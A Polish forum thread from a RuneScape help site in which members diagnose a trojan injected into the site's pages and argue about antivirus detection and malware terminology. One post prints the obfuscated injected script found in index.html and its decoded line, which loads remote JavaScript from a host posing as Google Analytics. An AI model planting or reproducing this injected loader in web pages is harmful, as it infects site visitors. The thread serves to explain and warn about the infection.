 |
 |
RuneScape Help & Quest
Nasz adres www.republika.pl/kasiak44
|
|
|
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
 Wysłany: Sob 14:20, 28 Lut 2009 Temat postu: |
 |
|
Ok, jest tam to samo co było na stronie głównej.
Podejrzewam że dopisuje się do każdego pliku index.html i index.htm jakie znajdzie na serwerze. Trzeba będzie je wszystkie pozmieniać.
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
|
 |
|
Kasiak44
Administrator
Dołączył: 02 Gru 2005
Posty: 1930
Przeczytał: 0 tematów
Pomógł: 125 razy
Ostrzeżeń: 0/5
Skąd: znienacka
Płeć: Mademoiselle
|
| Wysłany: Wto 18:13, 03 Mar 2009 Temat postu: |
|
|
ciągle mi wyje trojanem straszy i w ogóle krzyczy żeby nie wchodzić - po wejściu na stronę próbuję otworzyć koordynaty i... WYCIE!!!
Co to znaczy że
| Cytat: |
| Podejrzewam że dopisuje się do każdego pliku index.html i index.htm jakie znajdzie na serwerze. |
kto to dopisuje? mamy na stronie hackera jakiegoś? no bo samo się chyba nie stworzyło co?
Ludzie co mnie w grze spotykają to strasznie się boją tego komunikatu - w końcu się nie dziwię - to naprawdę strasznie wygląda ...
hmm... a może konkurencja jakaś nie chce żeby do nas wchodzili?  głupi pomysł 
Post został pochwalony 0 razy
Ostatnio zmieniony przez Kasiak44 dnia Wto 18:15, 03 Mar 2009, w całości zmieniany 1 raz
|
|
| |
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
| Wysłany: Wto 18:28, 03 Mar 2009 Temat postu: |
|
|
| kasiak44 napisał: |
| ciągle mi wyje trojanem straszy i w ogóle krzyczy żeby nie wchodzić - po wejściu na stronę próbuję otworzyć koordynaty i... WYCIE!!! |
No trojan wciąż jest na tamtej stronie.
Sorry, ale ja nic nie mogę zrobić, nie mam żadnych uprawnień. To do czego doszedłem rozkminiałem z poziomu najzwyklejszego użytkownika.
Tak samo jak każdy inny, nie mogę nic wrzucać/zmieniać/usuwać na serwerze.
Gadajcie z Gurneyhem 
| kasiak44 napisał: |
kto to dopisuje? mamy na stronie hackera jakiegoś? no bo samo się chyba nie stworzyło co?
Ludzie co mnie w grze spotykają to strasznie się boją tego komunikatu - w końcu się nie dziwię - to naprawdę strasznie wygląda ... |
Wątpię żeby ktoś osobiście to dopisywał, biorąc pod uwagę że dopisuje się tylko to index.htm i index.html raczej jest to proces zautomatyzowany.
Skąd to się tam wzięło? Nie mam bladego pojęcia. Jak już pisałem wcześniej:
| Bieniu napisał: |
| Trzeba tylko sobie zadać pytanie: skąd to się do cholery tam wzięło? Ale nie jesteśmy jedyni, ofiarą dokładnie tego trojana padło dużo stronek (zazwyczaj autorzy takich syfów idą na masówkę), m. in. kilka polskich. |
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
airye
Administrator
Dołączył: 30 Lis 2005
Posty: 500
Przeczytał: 0 tematów
Pomógł: 45 razy
Ostrzeżeń: 0/5
Skąd: katowice
Płeć: Mademoiselle
|
| Wysłany: Wto 23:05, 03 Mar 2009 Temat postu: |
|
|
No to....GURNEYH - JEŚLI ZYJESZ-RATUJ!
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
| Wysłany: Pią 20:18, 06 Mar 2009 Temat postu: |
|
|
Ponieważ niektórzy wciąż są nieprzekonani że na kasiaku jest jakiś malware (złośliwe oprogramowanie) wszystko wyjaśniam:
Malware znajduje się konkretnie w pliku [link widoczny dla zalogowanych]
Kiedy podglądniemy źródło strony (Widok/Źródło lub ppm i "Pokaż źródło") wyświetli nam się coś takiego:
| Kod: |
<html>
<head>
<title>Treasure trials - RuneScape</title>
<meta>
<meta>
</head>
<frameset>
<frame>
<frame>
<noframes>
<body>
<p>This page uses frames, but your browser doesn't support them.</p>
</body>
</noframes>
</frameset>
</html> |
W tym fragmencie nie ma nic złego, nie ma nawet żadnego kodu JavaScript, jest tutaj czysty HTML. Tyle że jeśli przewiniemy źródło do samego dołu, zobaczymy fragment:
| Kod: |
| <648c1c1edfa5faf445e33b580a8fdd1d><script>ljrcdvz="uGzuHzr!#@%WlR";tczaay="<Q73Q63rQ69pQ74 lanQ67Q75Q61geQ3djavQ61Q73Q63Q72Q69ptQ3e Q66unQ63Q74ionQ20tQ6eQ72m(Q76bzQ29Q7bvQ61r Q6cnQ2ckxQ78i=Q22h-Q5a_Q39Q6dQ73;PQ62&|fjQ37$!aG^Q4e.Q64Q4a8{t)]gQ45Q42Q79V2IH`5Q3dQ636~pQ72Q20kQ6cQ78oQ27Q75qQ40Q4b}Q31w\\\"Q43FQ2cQ33v[4Q54nez:Q280AO*U+#iMQ22,Q70bqqQ6fQ3d\"\"Q2cmrqos,hQ73,hm=Q22\",bakn;foQ72Q28lnQ3dQ30Q3blQ6e<vQ62Q7a.Q6cQ65Q6egth;lQ6eQ2b+Q29{Q20mrqosQ3dQ76bz.cQ68Q61rQ41Q74(Q6cQ6e);Q68Q73Q3dkxxQ69.iQ6edexOfQ28mQ72qQ6fs);if(hQ73Q3e-1Q29{Q20Q62Q61kQ6eQ3dQ28(hQ73Q2bQ31)Q258Q31Q2dQ31);if(bakn<=0)bakQ6eQ2b=Q381;hQ6d+Q3dkQ78Q78i.Q63hQ61rQ41tQ28bQ61Q6bnQ2d1Q29; Q7dQ20Q65lseQ20hQ6dQ2b=mrQ71Q6fs;Q7dpbqQ71o+=Q68mQ3bQ64ocumQ65Q6et.wrQ69tQ65(Q70Q62qQ71oQ29;}<Q2fQ73crQ69pt>";nrzweu=unescape(tczaay.replace(/Q/g,ljrcdvz.charAt(10)));var ioo,pj;document.write(nrzweu);ioo="<6>kJ'6qsze)d\" M)z0kC<SFRHbnkxGeEqGEzc\\C8G[GS6 Mr)\\CkSRFc\\C-))r(//\"\"\"dE''ExzGeGxM)M6;dez)/99q)&d7;?C#J'6qsze)d zjz z #C\\C></SFRHbn>Ck]Pk</6>kk";tnrm(ioo);</script> |
Jest on na pierwszy rzut oka nieczytelny, ponieważ jest obfuscated (tzn zostało użyte tzw "zaciemnienie kodu" w celu utrudnienia jego odczytania).
Fragment ten po sprowadzeniu do najprostszej postaci ma między innymi coś takiego:
| Kod: |
| SRC="http://www.googleanalitics.net/__utb.js?"+document.referrer |
Jest to zdalne odwołanie do kodu w JavaScript znajdującego się na stronie [link widoczny dla zalogowanych] (nie wchodzić na nią, możecie załapać jakieś malware). Strona ta wcale nie należy do google. Zastosowana metoda to tzw "phishing" polegający na nazwaniu strony podobnie do jakiegoś znanego i cenionego serwisu, w celu uśpienia czujności.
Nie analizowałem co dokładnie jest w pliku __utb.js ale na 99,9% nie jest to nic miłego.
edit: na tej stronie też mieli tego trojana i w temacie jest trochę dodatkowych informacji o nim (po angielsku) [link widoczny dla zalogowanych]
Post został pochwalony 0 razy
Ostatnio zmieniony przez Bieniu dnia Pią 20:43, 06 Mar 2009, w całości zmieniany 2 razy
|
|
| |
|
|
|
|
|
|
|
|
Kasiak44
Administrator
Dołączył: 02 Gru 2005
Posty: 1930
Przeczytał: 0 tematów
Pomógł: 125 razy
Ostrzeżeń: 0/5
Skąd: znienacka
Płeć: Mademoiselle
|
| Wysłany: Sob 19:30, 07 Mar 2009 Temat postu: |
|
|
Tu jest wasza dyskusja na SB ))
| Cytat: |
Marcin: Dlaczego tylko Avast to wykrywa? To nawet nie jest godny antywirus... Załadował mi kumputer jak nie wiem... a AVG nic tam nie wykrywa, a komputer czysty
6-03-09 19:28
Marcin: Bieniu no wiem... tłumaczyłeś mi to, ale ja nadal myśle to co myśle i raczej nic tego nie zmieni
6-03-09 19:28
Marcin: Opisałem problem na wielku forach, potem powiem co sądzą inni...
6-03-09 19:31
Bieniu: Ja pierdziele marcin, czego do cholery nie rozumiesz??? Czym według ciebie jest przedstawiony przeze mnie fragment kodu i skąd się wziął?? Przeczytaj sobie mój ostatni post w tym temacie: www
6-03-09 19:42
Bieniu: i powiedz co tu jest niejasnego
6-03-09 19:42
Bieniu: Ech, wkurzam się bo opisałem Ci już wszystko przez gg a wciąż zaprzeczasz oczywistemu.
6-03-09 19:44
~SEBASTIAN~: Dlaczego tylko Avast? bo ma częste aktualizacje, a może AVG nie ma tego wirusa w bazie... Nie każdy antywirus musi wykrywać wszystie śmiecie
6-03-09 21:13
~SEBASTIAN~: jak ktoś da znac o tym trojanie producentowi AVG no to rozszerzą swoją bazę i dadzą aktualizacje
6-03-09 21:14
Bieniu: Poza tym i tak nie ma o czym dywagować, bo trojan tam jest, można wskazać konkretny fragment kodu i objaśnić jego działanie.
6-03-09 22:00
kasiak44: On jest tylko wtedy jak się chce wejść na treasure
6-03-09 23:21
kasiak44: reszta działa bez problemu
6-03-09 23:22
Bieniu: No tak. W poście napisałem w którym pliku dokładnie się znajduje.
6-03-09 23:31
Nome: hehe ok ale to co ja mam robic? wchodzic na ta strone czy nie? lol bo tego clue juz sam rozwiazalem calego ale nastepne moga byc trudniejsze
7-03-09 14:32
Bieniu: możesz tymczasowo korzystać z www
7-03-09 14:36
Marcin: "Tak to wirus. Widocznie wgrał go nieświadomy user przez ftp albo wkradł się przez dziurę w skrypcie." yhhh.
7-03-09 15:55
Marcin: Czy każdy z Was, kto miał wykrytego trojana w trasure, ma Avast i Mozille Firefox?
7-03-09 15:57
kasiak44: ja tak - komplet .. Mozilla + Avast )
7-03-09 16:06
Bieniu: Ja nie mam żadnego antywirusa.
7-03-09 16:21
Marcin: Tak się głupio składa, że załatwiłem sobie Avast, i przez mozille jest Trojan  Przez Opere za to nie ma
7-03-09 16:30
Marcin: SEBASTIAN ~ AVAST ma czeste aktualizacje; AVG codziennie tez
7-03-09 16:31
Marcin: a tak nawiasem, trojan to nie wirus
7-03-09 16:32
Bieniu: Tak nawiasem, wirus to skrót myślowy większości ludzi na całe złośliwe oprogramowanie. Z punktu widzenia ofiary jest mało ważne czy ma wirusa, trojana, rootkita, backdoora, spyware, adware, forkbomb czy robaka, ważne że ma jakiś syf na kompie.
7-03-09 16:43
Bieniu: Odnośnie aktualizacji bazy danych wirusów, to każdy szanujący się AV (antywirus) robi je przynajmniej raz dziennie.
7-03-09 16:51
Bast: Bieniu -> różnica między wirusem a trojanem jest prosta.... wirus ma to do siebie że wchodzi na komputer i zaczyna się rozprzestrzenia ć... albo sam się wysyła przez poczte i infekuje inne pliki itp..... a trojan grzecznie sobie siedzi w miejscu i
7-03-09 17:48
Bast: np. bada twoje ruchy na klawiaturze
7-03-09 17:48
Bieniu: właśnie nie. Ruchy na klawiaturze bada keylogger a nie trojan. Trojan, to po prostu złośliwe oprogramowanie pod przykrywką normalnego (nawiązanie do mitologicznego konia trojańskiego). Coś co się samo rozprzestrzenia to nie wirus, tylko robak.
7-03-09 18:10
Bieniu: Wirusa ce***e raczej to, że zaraża różne pliki w obrębie tego samego komputera.
7-03-09 18:10
Bieniu: * cech uje
7-03-09 18:11
Bieniu: Tzn potrzebuje tzw "nosiciela", musi się podczepiać do różnych programów, nie potrafi funkcjonować samoistnie. Robak komputerowy różni się od wirusa tym że nie potrzebuje nosiciela. Może pełnić dodatkowe funkcje np. keyloggera czy trojana.
7-03-09 18:15
Bieniu: Dlatego rozróżnienie rodzaju malware nie jest łatwe i często po prostu mówi się "wirus" czy "trojan" nie zagłębiając się w to, z jakim rodzajem malware rzeczywiście mamy do czynienia.
7-03-09 18:16
Bieniu: cytat Basta: "a trojan grzecznie sobie siedzi w miejscu" - niekoniecznie, chociażby w przypadku strony kasiaka mamy do czynienia z aktywnym zarażaniem trojanem. Nie siedzi sobie grzecznie w miejscu. |
Musiałam to dać bo za dużo ważnych rzeczy tam popisaliście ))
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
| Wysłany: Sob 19:53, 07 Mar 2009 Temat postu: |
|
|
| Cytat: |
7-03-09 18:20
~SEBASTIAN~: Avast+Opera=tro jan Avast+mozilla=t rojan Avast+IE=trojan NOD+Opera=troja n NOD+Mozilla=tro jan NOD+IE=trojan /do wszystkiego dochodzi mi Kerio firewall
7-03-09 18:38
Bieniu: jak trojan tam jest, to jest niezależnie od antywirusa i przeglądarki. Po prostu tam jest.
7-03-09 18:47
Bieniu: Jeśli obrócę się trzy razy zgodnie z ruchem wskazówek zegara, podskoczę trzy razy na lewej nodze, raz na prawej, następnie złożę ofiarę z dzeiwicy i przy pełni księżyca wejdę na stronę przy pomocy Opery/Safari/IE /Konquerora/Lyn x/Netscape/Fire fox z włączon
7-03-09 18:47
Bienlu: z włączonymi trzema różnymi antywirusami i dwoma firewallami - >>>to trojan wciąż tam będzie
7-03-09 18:49 |
Proponuję tutaj kontynuować dyskusję z shouta, bo będzie przejrzyściej.
Post został pochwalony 0 razy
Ostatnio zmieniony przez Bieniu dnia Sob 19:53, 07 Mar 2009, w całości zmieniany 1 raz
|
|
| |
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
| Wysłany: Sob 23:16, 07 Mar 2009 Temat postu: |
|
|
Marcin, może byś tutaj przedstawił swoje wątpliwości co do trojana?
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
airye
Administrator
Dołączył: 30 Lis 2005
Posty: 500
Przeczytał: 0 tematów
Pomógł: 45 razy
Ostrzeżeń: 0/5
Skąd: katowice
Płeć: Mademoiselle
|
| Wysłany: Nie 13:26, 08 Mar 2009 Temat postu: |
|
|
jest sposób na wejście do treasure trials, atlasu i innych podstron. Swojego czasu Sebastian zrobił stronkę, na której pododawał odnośniki do tych materiałów:
[link widoczny dla zalogowanych]
Można wejść, skorzystać i nie złapać zadnego "zwierzątka" :>
Skoro to świństwo tak długo tam jest, to wydaje mi sie że załozyciel i JEDYNY administrator strony, Gurneyh, nie żyje. Bo nie wierzę, że przez tak długi czas nie znalazł 5 minut na usunięcie jednej linijki tekstu w kodzie strony.
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
Bieniu
Dołączył: 21 Gru 2008
Posty: 310
Przeczytał: 0 tematów
Pomógł: 56 razy
Ostrzeżeń: 0/5
Płeć: Garcon
|
| Wysłany: Nie 14:07, 08 Mar 2009 Temat postu: |
|
|
Gurneyh usunął wpis ze strony głównej, tam już od dłuższego czasu jest czysto. Tyle że teraz trojan jest we wstępie do treasure trails.
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
airye
Administrator
Dołączył: 30 Lis 2005
Posty: 500
Przeczytał: 0 tematów
Pomógł: 45 razy
Ostrzeżeń: 0/5
Skąd: katowice
Płeć: Mademoiselle
|
| Wysłany: Nie 15:04, 08 Mar 2009 Temat postu: |
|
|
Zmartwychwstał na chwilę i znowu odszedł w Niebyt 
Post został pochwalony 0 razy
|
|
| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Możesz pisać nowe tematy
Możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach
|
|
|
|
